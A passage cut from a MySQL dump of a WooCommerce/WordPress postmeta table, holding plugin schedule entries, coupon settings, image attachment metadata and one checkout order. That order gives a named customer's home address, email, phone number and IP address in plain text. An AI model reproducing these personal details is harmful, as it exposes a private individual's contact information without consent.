00;}'),(18931,32407,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565260541;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18932,32408,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565260541;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18934,32410,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565264379;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18935,32411,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565267986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18936,32412,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565267986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18937,32346,'_wp_trash_meta_status','auto-draft'),(18938,32346,'_wp_trash_meta_time','1565265832'),(18939,32346,'_wp_desired_post_slug',''),(18940,32415,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565271645;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18941,32416,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565271645;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18946,32428,'_edit_lock','1565270550:1'),(18947,32428,'_edit_last','1'),(18948,32427,'_edit_last','1'),(18942,27920,'_wp_trash_meta_status','publish'),(18943,27920,'_wp_trash_meta_time','1565270439'),(18944,27920,'_wp_desired_post_slug','kjg987'),(18945,32427,'_edit_lock','1565271249:1'),(18949,32427,'discount_type','fixed_product'),(18950,32427,'coupon_amount','189'),(18951,32427,'individual_use','no'),(18952,32427,'product_ids','80'),(18953,32427,'usage_limit','0'),(18954,32427,'usage_limit_per_user','0'),(18955,32427,'limit_usage_to_x_items','0'),(18956,32427,'usage_count','1'),(18957,32427,'date_expires',NULL),(18958,32427,'free_shipping','no'),(18959,32427,'exclude_sale_items','no'),(18960,32431,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270700;}'),(18961,32433,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270705;}'),(18962,32432,'_order_key','wc_order_OQ7xqTMBW9rUl'),(18963,32432,'_customer_user','1'),(18964,32432,'_payment_method','payfast'),(18965,32432,'_payment_method_title','PayFast'),(18966,32432,'_customer_ip_address','165.255.71.51'),(18967,32432,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(18968,32432,'_created_via','checkout'),(18969,32432,'_cart_hash','b29cb36132361a45fb59c1a1d44a42a7'),(18970,32432,'_billing_first_name','Imraan'),(18971,32432,'_billing_last_name','Wajoodeen'),(18972,32432,'_billing_company','Test'),(18973,32432,'_billing_address_1','103 Agapanthus avenue'),(18974,32432,'_billing_address_2','Lenasia'),(18975,32432,'_billing_city','Johannesburg'),(18976,32432,'_billing_state','GP'),(18977,32432,'_billing_postcode','1827'),(18978,32432,'_billing_country','ZA'),(18979,32432,'_billing_email','imraanmaw@gmail.com'),(18980,32432,'_billing_phone','0878025219'),(18981,32432,'_order_currency','ZAR'),(18982,32432,'_cart_discount','189'),(18983,32432,'_cart_discount_tax','0'),(18984,32432,'_order_shipping','0.00'),(18985,32432,'_order_shipping_tax','0'),(18986,32432,'_order_tax','0'),(18987,32432,'_order_total','10.00'),(18988,32432,'_order_version','3.6.5'),(18989,32432,'_prices_include_tax','no'),(18990,32432,'_billing_address_index','Imraan Wajoodeen Test 103 Agapanthus avenue Lenasia Johannesburg GP 1827 ZA imraanmaw@gmail.com 0878025219'),(18991,32432,'_shipping_address_index','        '),(18992,32432,'is_vat_exempt','no'),(18993,32434,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270701;}'),(18994,32432,'es_wc_activecampaign_opt_in','no'),(18995,32435,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270931;}'),(18996,32432,'_date_completed','1565270926'),(18997,32432,'_date_paid','1565270926'),(18998,32432,'_paid_date','2019-08-08 15:28:46'),(18999,32432,'_completed_date','2019-08-08 15:28:46'),(19000,32436,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270926;}'),(19001,32437,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565270926;}'),(19002,32432,'_download_permissions_granted','yes'),(19003,32432,'_recorded_sales','yes'),(19004,32432,'_recorded_coupon_usage_counts','yes'),(19005,32427,'_used_by','1'),(19006,32432,'_order_stock_reduced','yes'),(19007,32432,'_bewpi_invoice_date','2019-08-08 15:28:47'),(19008,32432,'_bewpi_invoice_number','32432'),(19009,32432,'_bewpi_invoice_pdf_path','/32432-2019.pdf'),(19010,32432,'bewpi_pdf_invoice_sent','1'),(19011,32439,'_wp_trash_meta_status','publish'),(19012,32439,'_wp_trash_meta_time','1565271330'),(19013,32440,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565275306;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19014,32441,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565275307;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19015,32442,'_wp_attached_file','2019/08/app-03.png'),(19016,32442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:473;s:4:\"file\";s:18:\"2019/08/app-03.png\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"app-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"app-03-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"app-03-768x336.png\";s:5:\"width\";i:768;s:6:\"height\";i:336;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"app-03-1024x448.png\";s:5:\"width\";i:1024;s:6:\"height\";i:448;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:18:\"app-03-610x267.png\";s:5:\"width\";i:610;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"app-03-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:19:\"app-03-1080x473.png\";s:5:\"width\";i:1080;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"app-03-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"app-03-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:19:\"app-03-1080x473.png\";s:5:\"width\";i:1080;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"app-03-400x473.png\";s:5:\"width\";i:400;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"app-03-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"app-03-510x223.png\";s:5:\"width\";i:510;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"app-03-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"app-03-510x223.png\";s:5:\"width\";i:510;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19017,32443,'_wp_attached_file','2019/08/app-04.png'),(19018,32443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:1034;s:4:\"file\";s:18:\"2019/08/app-04.png\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"app-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"app-04-179x300.png\";s:5:\"width\";i:179;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"app-04-610x1024.png\";s:5:\"width\";i:610;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:19:\"app-04-610x1024.png\";s:5:\"width\";i:610;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"app-04-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:18:\"app-04-616x675.png\";s:5:\"width\";i:616;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"app-04-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"app-04-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"app-04-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"app-04-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"app-04-510x856.png\";s:5:\"width\";i:510;s:6:\"height\";i:856;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"app-04-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"app-04-510x856.png\";s:5:\"width\";i:510;s:6:\"height\";i:856;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19019,32444,'_wp_attached_file','2019/08/app-02.png'),(19020,32444,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:1209;s:4:\"file\";s:18:\"2019/08/app-02.png\";s:5:\"sizes\";a:16:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"app-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"app-02-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"app-02-768x1092.png\";s:5:\"width\";i:768;s:6:\"height\";i:1092;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"app-02-720x1024.png\";s:5:\"width\";i:720;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:18:\"app-02-610x868.png\";s:5:\"width\";i:610;s:6:\"height\";i:868;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"app-02-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:18:\"app-02-850x675.png\";s:5:\"width\";i:850;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"app-02-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"app-02-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"app-02-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"app-02-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"app-02-510x725.png\";s:5:\"width\";i:510;s:6:\"height\";i:725;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"app-02-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"app-02-510x725.png\";s:5:\"width\";i:510;s:6:\"height\";i:725;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19021,32445,'_wp_attached_file','2019/08/app-09.png'),(19022,32445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:18:\"2019/08/app-09.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19023,32446,'_wp_attached_file','2019/08/app-010-1.png'),(19024,32446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:21:\"2019/08/app-010-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19025,32447,'_wp_attached_file','2019/08/app-11-1.png'),(19026,32447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:20:\"2019/08/app-11-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19027,32448,'_wp_attached_file','2019/08/app-12.png'),(19028,32448,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:18:\"2019/08/app-12.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19029,32449,'_wp_attached_file','2019/08/app-19.png'),(19030,32449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:644;s:4:\"file\";s:18:\"2019/08/app-19.png\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"app-19-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"app-19-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"app-19-768x495.png\";s:5:\"width\";i:768;s:6:\"height\";i:495;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:18:\"app-19-610x393.png\";s:5:\"width\";i:610;s:6:\"height\";i:393;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"app-19-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"app-19-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"app-19-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"app-19-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"app-19-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"app-19-510x328.png\";s:5:\"width\";i:510;s:6:\"height\";i:328;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-19-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"app-19-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"app-19-510x328.png\";s:5:\"width\";i:510;s:6:\"height\";i:328;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"app-19-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19031,32450,'_wp_attached_file','2019/08/app-developer-icon-small-01.png'),(19032,32450,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:39:\"2019/08/app-developer-icon-small-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19033,32451,'_wp_attached_file','2019/08/app-developer-icon-small-03.png'),(19034,32451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:39:\"2019/08/app-developer-icon-small-03.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19035,32452,'_wp_attached_file','2019/08/Asset-3.png'),(19036,32452,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:673;s:4:\"file\";s:19:\"2019/08/Asset-3.png\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Asset-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Asset-3-183x300.png\";s:5:\"width\";i:183;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"Asset-3-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"Asset-3-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:19:\"Asset-3-411x382.png\";s:5:\"width\";i:411;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"Asset-3-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"Asset-3-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Asset-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Asset-3-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Asset-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19037,32453,'_wp_attached_file','2019/08/app-developer-icon-small-05.png'),(19038,32453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:39:\"2019/08/app-developer-icon-small-05.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1: